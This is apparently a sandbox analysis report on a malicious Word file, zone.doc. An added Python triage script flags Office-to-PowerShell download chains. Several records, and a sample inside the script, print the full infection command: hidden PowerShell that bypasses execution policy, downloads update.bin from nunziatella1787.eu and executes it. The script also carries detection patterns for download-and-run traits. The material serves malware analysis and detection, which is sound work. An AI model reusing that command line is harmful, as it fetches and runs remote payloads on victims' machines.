Source: powershell.exe | String found in binary or memory: file:// |
Source: WINWORD.EXE, powershell.exe | String found in binary or memory: file:/// |
Source: WINWORD.EXE | String found in binary or memory: file:///c: |
Source: WINWORD.EXE | String found in binary or memory: file:///c:/users/admin/oaded%20program%20files |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_32/system.transactions/2.0.0.0__b77a5c561934e089/system.transactions |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.diagnostics/1.0.0.0__31bf3856ad36 |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.management/1.0.0.0__31bf3856ad364 |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.utility/1.0.0.0__31bf3856ad364e35 |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.consolehost/1.0.0.0__31bf3856ad364e35/micr |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.security/1.0.0.0__31bf3856ad364e35/microso |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.wsman.management/1.0.0.0__31bf3856ad364e35/microsoft. |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.configuration.install/2.0.0.0__b03f5f7f11d50a3a/system.c |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.core/3.5.0.0__b77a5c561934e089/system.core.dll |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.directoryservices/2.0.0.0__b03f5f7f11d50a3a/system.direc |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.management.automation/1.0.0.0__31bf3856ad364e35/system.m |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.management/2.0.0.0__b03f5f7f11d50a3a/system.management.d |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.xml/2.0.0.0__b77a5c561934e089/system.xml.dll |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system/2.0.0.0__b77a5c561934e089/system.dll |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/microsoft.net/framework/v2.0.50727/mscorlib.dll |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/ |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/ |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/; |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/en-us |
Source: WINWORD.EXE | String found in binary or memory: ftp:// |
Source: WINWORD.EXE, powershell.exe | String found in binary or memory: http:// |
Source: powershell.exe | String found in binary or memory: http://nunziatel |
Source: powershell.exe | String found in binary or memory: http://nunziatelh |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu/ |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu/cl |
Source: WINWORD.EXE | String found in binary or memory: http://nunziatella1787.eu/cli/update.b |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu/cli/update.bin |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu/cli/update.binh |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu/cli/uph |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787h |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponse |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponseh |
Source: WINWORD.EXE | String found in binary or memory: http://www.msnusers.com |
Source: WINWORD.EXE | String found in binary or memory: https:// |
Source: | Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe |
Source: | Binary string: mscorlib.pdb source: powershell.exe |
Source: | Binary string: dows\mscorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe |
Source: | Binary string: mscorrc.pdb source: powershell.exe |
Source: | Binary string: rlib.pdb source: powershell.exe |
Source: | Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe |
Source: | Binary string: C:\Windows\mscorlib.pdbjj source: powershell.exe |
Source: | Binary string: indows\System.pdbpdbtem.pdb_3 source: powershell.exe |
Source: | Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe |
Source: | Binary string: G:\o14\65_VC8\VBE6\legovbe\vbe7.pdb source: WINWORD.EXE |
Source: | Binary string: indows\mscorlib.pdbpdblib.pdb source: powershell.exe |
Source: | Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbs\a source: powershell.exe |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write (UTF-16 console buffer dump; only the readable fragments are kept): ...ned an error: (404) Not Found." |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: At line:1 char:860 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ...WScript.Shell).Exec($f) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ...specified |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: At line:1 char:171 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ...pt.Shell).Exec <<<< ($f) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: unknown | Process created: C:\Windows\System32\wisptis.exe |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://nunziatella1787.eu/cli/update.bin' $f);(New-Object -com WScript.Shell).Exec($f) |
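The record above is the whole infection chain in one line: an Office process spawns a hidden PowerShell that bypasses the execution policy, stages a temp file, fetches a payload over HTTP and runs it through WScript.Shell. The Python below is an added triage script, not part of the sandbox report, that parses "Process created" records in this report's own "Source: ... | Process created: ... |" layout, tags the parent/child pair and the command-line traits that make the chain suspicious, and extracts the download URL and domain as indicators. The sample records are constructed: the first copies the parent, child and command line from the record above, the other two are made up for contrast (an explorer-launched interactive shell and the wisptis.exe record with no command line). The tag names, trait patterns and scoring rule are this script's own assumptions, not anything the sandbox defines.

```python
"""Triage sandbox "Process created" records for Office -> script-host
download-and-execute chains and pull out network indicators.

Added example for this report; not sandbox output. Sample records are
constructed (the first mirrors the WINWORD.EXE -> powershell.exe record).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Constructed sample records in the report's "Source: X | Process created: Y |" layout.
SAMPLE_RECORDS = [
    "Source: C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE | Process created: "
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass "
    "-WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();"
    "(New-Object System.Net.WebClient).DownloadFile('http://nunziatella1787.eu/cli/update.bin' $f);"
    "(New-Object -com WScript.Shell).Exec($f) |",
    # Benign contrast (constructed): explorer starting an interactive shell.
    "Source: C:\\Windows\\explorer.exe | Process created: "
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell.exe -NoLogo |",
    # No command line at all (as in the report's wisptis.exe record).
    "Source: unknown | Process created: C:\\Windows\\System32\\wisptis.exe |",
]

# Assumed lists: Office parents and the script/LOLBin hosts they should never spawn.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Child image is everything up to the first ".exe"; the rest is the command line.
IMAGE_RE = re.compile(r"^(?P<image>.*?\.exe)(?:\s+(?P<cmdline>.*))?$", re.I | re.S)
URL_RE = re.compile(r"https?://[^\s'\"();]+", re.I)

# Command-line traits and the tag each contributes. Deliberately loose: PowerShell is
# case-insensitive and accepts abbreviated switches such as -ep and -w.
TRAITS = [
    ("execution_policy_bypass", re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("temp_file_staging", re.compile(r"GetTempFileName|\$env:TEMP|%TEMP%", re.I)),
    ("network_download", re.compile(
        r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)),
    ("launches_payload", re.compile(
        r"WScript\.Shell\)\.Exec|\.Run\(|Start-Process|Invoke-Expression|\biex\b", re.I)),
]


@dataclass
class Finding:
    parent: str
    child: str
    tags: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)

    @property
    def domains(self) -> List[str]:
        return sorted({urlparse(u).hostname for u in self.urls if urlparse(u).hostname})

    @property
    def suspicious(self) -> bool:
        # Office spawning a script host needs one more evasion/download trait to fire;
        # any other parent must show the full fetch-then-run pattern.
        if "office_spawns_script_host" in self.tags:
            return len(self.tags) >= 2
        return {"network_download", "launches_payload"} <= set(self.tags)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(record: str) -> Optional[Finding]:
    """Parse one report line; return None for lines that are not Process created records."""
    line = record.strip()
    if line.endswith("|"):
        line = line[:-1].rstrip()
    # Split on the first separator only: PowerShell pipes may appear inside the command line.
    head, sep, rest = line.partition(" | ")
    if not sep or not head.startswith("Source:") or not rest.startswith("Process created:"):
        return None
    parent = head[len("Source:"):].strip()
    im = IMAGE_RE.match(rest[len("Process created:"):].strip())
    if not im:
        return None
    child, cmdline = im.group("image"), im.group("cmdline") or ""
    f = Finding(parent=parent, child=child)
    if _basename(parent) in OFFICE_PARENTS and _basename(child) in SCRIPT_HOSTS:
        f.tags.append("office_spawns_script_host")
    f.tags.extend(tag for tag, pat in TRAITS if pat.search(cmdline))
    f.urls = URL_RE.findall(cmdline)
    return f


def triage(records) -> List[Finding]:
    """Return only the records that meet the suspicious rule."""
    return [f for f in map(analyse, records) if f is not None and f.suspicious]


if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"{_basename(f.parent)} -> {_basename(f.child)}: {', '.join(f.tags)}")
        for d in f.domains:
            print("  domain:", d)
        for u in f.urls:
            print("  url:   ", u)
```

Run against the three sample records, only the WINWORD.EXE -> powershell.exe record is reported, carrying all six tags plus the update.bin URL and the nunziatella1787.eu domain; the explorer-launched shell and the wisptis.exe record produce no tags. The URL regex stops at the closing quote, so the missing comma before `$f` in the captured command line does not affect indicator extraction.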
Source: zone.doc | OLE document summary: title field not present or empty |
Source: zone.doc | OLE document summary: author field not present or empty |
Source: zone.doc | OLE document summary: edited time not present or 0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376 | Thread sleep time: -60000ms >= -60000ms |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304 | Thread sleep time: -922337203685477ms >= -60000ms |
Source: C:\Windows\System32\wisptis.exe TID: 2316 | Thread sleep time: -60000ms >= -60000ms |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: C:\ VolumeInformation |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: C:\zone.doc VolumeInformation |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: C:\ VolumeInformation |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: C:\Users\admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |